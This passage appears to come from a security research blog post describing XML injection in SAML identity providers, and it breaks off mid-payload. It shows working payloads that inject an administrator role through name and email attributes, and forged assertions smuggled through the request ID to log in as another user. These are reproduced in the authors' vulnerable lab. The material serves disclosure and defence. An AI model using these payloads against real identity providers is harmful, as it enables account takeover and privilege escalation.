The attack may also fail if the service provider includes defenses against XML Signature Wrapping (XSW)*. This is a well-documented SAML vulnerability, where an attacker modifies the structure of a SAML response in an attempt to trick the service provider into reading the user’s identity from an unsigned element (e.g. by adding a second unsigned assertion to a SAML response, before the legitimate signed assertion). Although an XML injection attack would mean that both assertions are included in the scope of the SAML response signature, simply the presence of a second assertion element can be enough for some service providers to reject the message.
* For a good overview of XML Signature Wrapping attacks, see
On Breaking SAML: Be Whoever You Want to Be
Example Exploits
In assessments performed by NCC Group, this vulnerability was most commonly exploitable in two scenarios;
-
Attribute injections
– where the injection occurs in a SAML attribute associated with the account in the Identity Provider.
-
InResponseTo injections
– where the injection affects the “InResponseTo” attribute of the SAML response.
Example exploits for these two scenarios have been provided in the following section. As it would be impossible to demonstrate all possible XML injection attacks on SAML implementations in this blog post, hopefully these can provide some inspiration. The techniques outlined here can likely be adapted to exploit identity providers affected by this vulnerability in most configurations.
Disclaimer: These examples were reproduced in a local environment specifically built to be vulnerable to this attack.
Attribute Injections
In addition to the NameID (which is the unique identifier for the user), SAML responses can include a set of user attributes that may be useful to the service provider. These are optional and there are no particular requirements; typically they are used to send data such as the user’s name, email address, and phone number. Some service providers also use the attributes to dictate the privileges that should be assigned to the user post-authentication, using a role attribute or similar. Therefore, if these attributes are not appropriately encoded, an attacker could inject or modify attributes to escalate their privileges or otherwise gain access to sensitive data in the service provider.
As an example, if the SAML assertion contains an AttributeStatement such as the following. This includes two attributes; one for the user’s full name and another for the user’s role (viewer):
<saml:AttributeStatement xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
The attacker could change their name in the identity provider to the following value:
Adam Roberts</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi_type="xs:string">administrator
If the identity provider includes this value in the name attribute without appropriate validation, the following AttributeStatement will be sent to the service provider. This may allow the attacker to authenticate to the application under the context of an “administrator”, rather than a “viewer”:
<saml:AttributeStatement xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">administrator</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
Note that the “role” Attribute element is repeated, and it is therefore possible that the attack may fail if the service provider reads the second role attribute value, or if a validator rejects the assertion. If the attacker controls two attributes (e.g. the name and an email address), it may be possible to use XML comments to effectively delete the role attribute generated by the identity provider. Take the following AttributeStatement as an example. This includes the user’s email address, the role, and a name attribute:
<saml:AttributeStatement xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">[email protected]</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
The role attribute is included between the email and name attributes. An attacker could set their email address and name to the following values:
email: [email protected]</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi_type="xs:string">administrator</saml:AttributeValue></saml:Attribute><!--
name: --><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi_type="xs:string">Adam Roberts
When the AttributeStatement element is built by the identity provider, the following XML will be produced, where the “viewer” role attribute is enclosed within an XML comment:
<saml:AttributeStatement xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">[email protected]</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">administrator</saml:AttributeValue>
</saml:Attribute>
<!--</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi_type="xs:string">viewer</saml:AttributeValue></saml:Attribute><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi_type="xs:string">-->
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi_type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
When parsed by the service provider, the user will be authenticated to the application under the context of an administrator.
Comments can be a useful tool when exploiting XML injections in SAML messages. When done correctly, it is often possible to control large parts of the SAML response or assertion, meaning it can be particularly effective in subverting restrictions imposed by strict service providers. It is worth noting that most XML signature schemes used by SAML implementations canonicalize XML documents prior to calculating a signature, and as part of this process comments are removed from the document. In other words, comments in a SAML response are not considered when the signature is calculated, and can therefore be removed entirely before submission to the service provider. If it is possible to inject XML into two locations within a SAML response, the opportunities for exploitation are much greater through the use of XML comments.
InResponseTo and Assertion Injections
Injections which affect the InResponseTo attribute occur when the SAML request ID is included dangerously within the response. As mentioned previously, the vast majority of SAML identity providers reflect the value of the SAML request ID in the response, and this is therefore considered a very reliable attribute to probe for injections. Exploiting this type of injection, however, can be extremely difficult. The primary reason is that the the value is included in the SAML response in two locations; the first is within the InResponseTo attribute of the Response element, and the second is within the InResponseTo attribute of the SubjectConfirmationData element, in the assertion.
Below is an example of a SAML response generated by an identity provider (hosted on a local server) affected by this vulnerability. The InResponseTo attribute contains the value “_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46”, which was set by the service provider in the SAML request:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_bb9456e6-ffbe-4117-94ca-1800923389b4" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns_ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_bb9456e6-ffbe-4117-94ca-1800923389b4">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>gj6oIvcJnXaTBtVRwyNVGaIwwEaCuO0jZizyG/Z94aU=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>ueEVB+Xt+kiZZ/g8+9LpO6IWevTatj0NnYLYUwcluqEGlYWMyXef5uQpWf89BO/j294jnIA9KifnqwvhZZr5Ma5e1UQ5/C5d3lTkSA8MTi3DZ8AuHmEtvnC83ivD9IJizcyr0KbwcHtJVzisvvYDwo/f5xq3IrFtqA18tL/mMVA=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa80f7dc-12d1-490c-b19f-c99773167f4b" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T00:23:22.727Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-12T00:18:22.727Z" NotOnOrAfter="2021-02-12T00:23:22.727Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-12T00:18:22.727Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
The goal for most attackers here would be to inject a new assertion that includes a different NameID, and thereby gain access to another user’s account on the service provider. The following payload (decoded and formatted for readability), when included in the ID of the SAML request sent to the identity provider, achieves this.
_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test="
There are a few elements to this payload, explained below:
-
First, “> is used to escape from the InResponseTo attribute and into the XML context.
-
In the injected XML, copies of the Issuer and Status elements included in other responses observed from the identity provider are included.
-
Then, an entirely new assertion is created, with a NameID which specifies the email address “[email protected]”. This assertion was built using assertions taken from legitimate responses generated by the server; the NameID field was modified, along with the NotOnOrAfter attributes (to specify a time in the future) and the InResponseTo attribute, to include the ID of the SAML request. Replacing these values ensure that the service provider will not reject the assertion, as it will expect an assertion that is not expired, and that was generated for the SAML request it previously issued.
-
Finally, an unrelated element “elem” is opened at the end, with an attribute. This is designed to fix dangling markup left by the Response and SubjectConfirmationData elements created by the identity provider, where the injection points occur. Note, however, that this step is considered optional, and its necessity will depend on how tolerant the XML parser is. Some parsers will reject the XML document if the dangling markup is not part of an element, while others will simply treat the dangling markup as an additional text node. If the server rejects the payload without this element, try including it in another SAML request.
The following SAML request contains this payload, encoded for transport:
<samlp:AuthnRequest xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46 quot; gt; lt;saml:Issuer gt;http://idp.adam.local:8080 lt;/saml:Issuer gt; lt;samlp:Status gt; lt;samlp:StatusCode Value= quot;urn:oasis:names:tc:SAML:2.0:status:Success quot;/ gt; lt;/samlp:Status gt; lt;saml:Assertion ID= quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b quot; IssueInstant= quot;2021-02-11T22:45:54.579Z quot; Version= quot;2.0 quot; xmlns_saml= quot;urn:oasis:names:tc:SAML:2.0:assertion quot; xmlns_xs= quot;http://www.w3.org/2001/XMLSchema quot; xmlns_xsi= quot;http://www.w3.org/2001/XMLSchema-instance quot; gt; lt;saml:Issuer gt;http://idp.adam.local:8080 lt;/saml:Issuer gt; lt;saml:Subject gt; lt;saml:NameID Format= quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress quot; gt;[email protected] lt;/saml:NameID gt; lt;saml:SubjectConfirmation Method= quot;urn:oasis:names:tc:SAML:2.0:cm:bearer quot; gt; lt;saml:SubjectConfirmationData InResponseTo= quot;_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46 quot; NotOnOrAfter= quot;2021-02-11T23:50:54.579Z quot; Recipient= quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1 quot;/ gt; lt;/saml:SubjectConfirmation gt; lt;/saml:Subject gt; lt;saml:Conditions NotBefore= quot;2021-02-11T22:45:54.579Z quot; NotOnOrAfter= quot;2021-02-11T23:50:54.579Z quot; gt; lt;saml:AudienceRestriction gt; lt;saml:Audience gt;http://sp.adam.local/ lt;/saml:Audience gt; lt;/saml:AudienceRestriction gt; lt;/saml:Conditions gt; lt;saml:AuthnStatement AuthnInstant= quot;2021-02-11T22:45:54.579Z quot; gt; lt;saml:AuthnContext gt; lt;saml:AuthnContextClassRef gt;urn:oasis:names:tc:SAML:2.0:ac:classes:Password lt;/saml:AuthnContextClassRef gt; lt;/saml:AuthnContext gt; lt;/saml:AuthnStatement gt; lt;/saml:Assertion gt; lt;elem test= quot;" Version="2.0" IssueInstant="2021-02-11T23:45:28Z" Destination="http://idp.adam.local:8080/SSOService" AssertionConsumerServiceURL="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>http://sp.adam.local/</saml:Issuer><samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/></samlp:AuthnRequest>
When this was received by the identity provider, the following SAML response was produced. The injected XML has been highlighted in bold, although note that the XML was adjusted when the identity provider inserted the XML signature:
<samlp:Response xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_b804b8b3-1ced-4e16-9ef3-03b82338729b" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns_ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_b804b8b3-1ced-4e16-9ef3-03b82338729b">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>oE/7pnmcvbFYVsIPC4tao56UR/yAkpv3VL/VBXZXrXk=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>mA6oPZaOUMXxlFRQG5LzoVpmV4VB5K4iIQJ2sseqgYLXhrszbvJ85v7Qud6Fp8xKqC4nVIUZw73eHR2d4nakLKd0lPAqk7gTVC+1V1M3lpMkMCriqM5BNcR/lKpln3SnEzgUPAtbOgmsvKSmhME7fXIY9BUW0Kv/8FcCEdUGg70=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test=""/>
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_68a25c00-2c08-458a-a760-40f5a55ada07" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-11T23:50:49.796Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/>
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<elem test=""/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T23:45:49.796Z" NotOnOrAfter="2021-02-11T23:50:49.796Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T23:45:49.796Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
It should be noted that, due to the existence of two injection points, this SAML response contains three assertions; one injected using the XML injection payload, the second produced by the identity provider (with the legitimate [email protected] NameID), and another injected assertion embedded within the legitimate assertion (at the location of the second InResponseTo attribute). As described previously, the handling of such a SAML response will depend on the configuration of the service provider. During tests performed by NCC Group, the vulnerable identity provider was connected to a SimpleSAMLphp installation; this accepted the SAML response, and used the first occurrence of the assertion to authenticate the user, meaning that the attacker was logged in to the service under the context of [email protected].
If the service provider uses the second assertion instead of the first, or if it rejects the response due to the repeated assertions, it may be possible to utilize XML comments again to effectively remove the identity provider’s assertion from the response. Two methods have been used successfully in tests performed by NCC Group. The first, if the XML parser used by the service provider is not too strict, simply leaves an unterminated comment at the end of the payload. The identity provider may ignore the lack of a closure for the comment, and generate a signature for the response using only the attacker’s assertion. An example of a payload which may achieve this has been provided below (decoded and formatted for readability):
_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-12T06:51:42.705Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</saml:Response><!--
When the SAML response was generated by the identity provider, the content following the “<!–” string was ignored, effectively removing both the identity provider’s assertion, and the second assertion reflected at the second InResponseTo insertion point.
Some identity providers will reject this payload, however, because the XML is invalid with an unterminated comment. To circumvent this restriction, the following alternative payload was developed (again, decoded and formatted for readability):
_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' -->
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
